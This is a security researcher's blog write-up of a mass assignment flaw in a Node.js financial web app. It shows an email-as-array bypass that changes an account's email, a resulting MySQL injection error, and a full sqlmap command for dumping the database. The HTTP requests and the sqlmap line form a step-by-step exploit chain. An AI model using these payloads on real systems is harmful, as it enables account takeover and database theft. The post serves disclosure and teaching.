Unveiling the Consequences: Database Dump Exploitation through Mass Assignment Vulnerability

- 8 mins
Bypasss Mass Assignment SQL Injection Database Dump

Introduction

Mass assignment vulnerability, also known as over-posting vulnerability, is a security flaw that can occur in web applications that utilize frameworks or libraries that automatically bind user-submitted data to corresponding model properties or database columns. This vulnerability allows attackers to manipulate and modify sensitive data by submitting unexpected or unauthorized values for those properties.

The vulnerability arises when developers don’t properly validate or sanitize user input before assigning it to model properties. In certain frameworks, this behavior is convenient as it simplifies the process of mapping user input to model objects. However, it becomes a security concern when sensitive fields, such as authentication credentials, access controls, or administrative privileges, can be manipulated by malicious users.

Here’s an example to illustrate the issue:

Consider a web application that allows users to update their profile information, such as name, email, and password. The application uses a framework that automatically binds the form data to the corresponding fields in the user model.

class User < ActiveRecord::Base
  attr_accessible :name, :email # Vulnerable code
  ...
end

In the above code, the developer has used the attr_accessible method to specify that the name and email fields are accessible and can be assigned from user input.

However, an attacker can manipulate the request payload by adding additional form fields that were not intended to be modified by the user, such as:

<form action="/profile" method="POST">
<input type="text" name="name" value="John Doe">
<input type="text" name="email" [value="johndoe@example.com](mailto:value=%22johndoe@example.com)">
<input type="hidden" name="admin" value="true"> <!-- Unintended field -->
<input type="submit" value="Update">
</form>

In this example, the attacker has added a hidden input field named “admin” with the value set to “true.” When the form is submitted, the framework blindly assigns the value “true” to the “admin” field in the user model, even though it was not intended to be modifiable by the user. This can grant the attacker administrative privileges or other unauthorized access.

Target Background

The web application is developed using the Node.js framework. It incorporates dynamic roles, allowing the creation and assignment of new roles to users based on business requirements. The application is mostly used for financial purposes.

Technology Stack

The technology stack used in the Target application includes the following components:

  • Bootstrap
  • Express
  • Node.js

CRUD Operation

CRUD refers to Create, Read, Update, and Delete operations, which are fundamental to managing data in both database systems and web applications. Each letter in the acronym represents a specific operation.

Exploiting Mass Assignment Vulnerability

The Target application provides a feature that allows users to update their profiles with various details. However, changing the email address is restricted since users sign up using their email addresses.

Request

POST /editUser HTTP/2
Host: abc.com
Cookie: blah....blah...
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Csrf-Token: csrf_token_value
Referer: https://abc.com/dashboard
Content-Length: 534
Origin: https://abc.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{
  "user_Id": "2abaac0a-4af8-4101-a763-9d0229cafb12",
  "email": "naveenj@thevillagehacker.com",
  "Mobile": "9874563217",
  "role": "Analyst",
  "isActive": true
}

The above request demonstrates that the application allows users to update their details, including email. However, the user interface disables the edit email field.

Response

HTTP/1.1 200 OK 
Access-Control-Allow-Origin: * 
Content-Type: application/json; charset=utf-8 
Set-Cookie: blah...blah...blah...; Path=/; HttpOnly 
X-Frame-Options: SAMEORIGIN 
X-Content-Type-Options: nosniff 
X-XSS-Protection: 1; mode=block 
Referrer-Policy: strict-origin-when-cross-origin 
Connection: close 
Strict-Transport-Security: max-age=31536000; includeSubDomains

{
  "Success": true,
  "Message": "User details Updated"
}

The server responds with a 200 OK status code and a success message indicating that the user’s details have been successfully updated.

Bypassing the Security Measures

Changing the existing email value in the request results in an Invalid Request Data error response. However, this protection can be bypassed by passing the email as an array.

{
  "user_Id": "2abaac0a-4af8-4101-a763-9d0229cafb12",
  "email": [
    "naveenj@thevillagehacker.com",
    "attacker@thevillagehacker.com"
  ],
  "Mobile": "9874563217",
  "role": "Analyst",
  "isActive": true
}

After sending the above request, the server responds with a “200 OK” status code and a success message, indicating that the user details have been updated.

GET /user_detail

To retrieve the current user’s details, a GET request to /user_detail is made.

Request

GET /user_detail HTTP/2
Host: abc.com
Cookie: blah....blah...
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Csrf-Token: csrf_token_value
Referer: https://abc.com/dashboard
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

Response

HTTP/1.1 200 OK 
Access-Control-Allow-Origin: * 
Content-Type: application/json; charset=utf-8 
Set-Cookie: blah...blah...blah...; Path=/; HttpOnly 
X-Frame-Options: SAMEORIGIN 
X-Content-Type-Options: nosniff 
X-XSS-Protection: 1; mode=block 
Referrer-Policy: strict-origin-when-cross-origin 
Connection: close 
Strict-Transport-Security: max-age=31536000; includeSubDomains

{
  "user_Id": "2abaac0a-4af8-4101-a763-9d0229cafb12",
  "email": "attacker@thevillagehacker.com",
  "Mobile": "9874563217",
  "role": "Analyst",
  "isActive": true
}

The response contains the user’s details, including the updated email address.

SQL Injection

Attempts to exploit SQL injection vulnerabilities on the application were unsuccessful. However, this new array method shows potential for further exploration.

When special characters and spaces are added as input in the array, the server responds with a SQL syntax error.

Request

POST /editUser HTTP/2
Host: abc.com
Cookie: blah....blah...
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Csrf-Token: csrf_token_value
Referer: https://abc.com/dashboard
Content-Length: 534
Origin: https://abc.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{
  "user_Id": "2abaac0a-4af8-4101-a763-9d0229cafb12",
  "email": [
    "naveenj@thevillagehacker.com",
    " "
  ],
  "Mobile": "9874563217",
  "role": "Analyst",
  "isActive": true
}

Response

HTTP/1.1 200 OK 
Access-Control-Allow-Origin: * 
Content-Type: application/json; charset=utf-8 
Set-Cookie: blah...blah...blah...; Path=/; HttpOnly 
X-Frame-Options: SAMEORIGIN 
X-Content-Type-Options: nosniff 
X-XSS-Protection: 1; mode=block 
Referrer-Policy: strict-origin-when-cross-origin 
Connection: close 
Strict-Transport-Security: max-age=31536000; includeSubDomains

{
  "code": 400,
  "message": "ER_PARSE_ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ' '*'' at line 1"
}

The server responds with an error message indicating a SQL syntax error. This suggests that the application is using a MySQL database. Further exploitation can be automated using SQLMAP.

SQLMAP Automation

python .\sqlmap\sqlmap.py -r "request.txt" --batch --dbs --risk 3 --level 4 --random-agent --tamper=between --proxy=http://127.0.0.1:8080

Dumping Database

image

Thanks for reading!

For more insights and updates, follow me on Twitter: @thevillagehacker.

Related Posts

Naveen J

Naveen J

Security Researcher | Appsec Specialist@SISA Information Security | Web 3 Security Enthusiast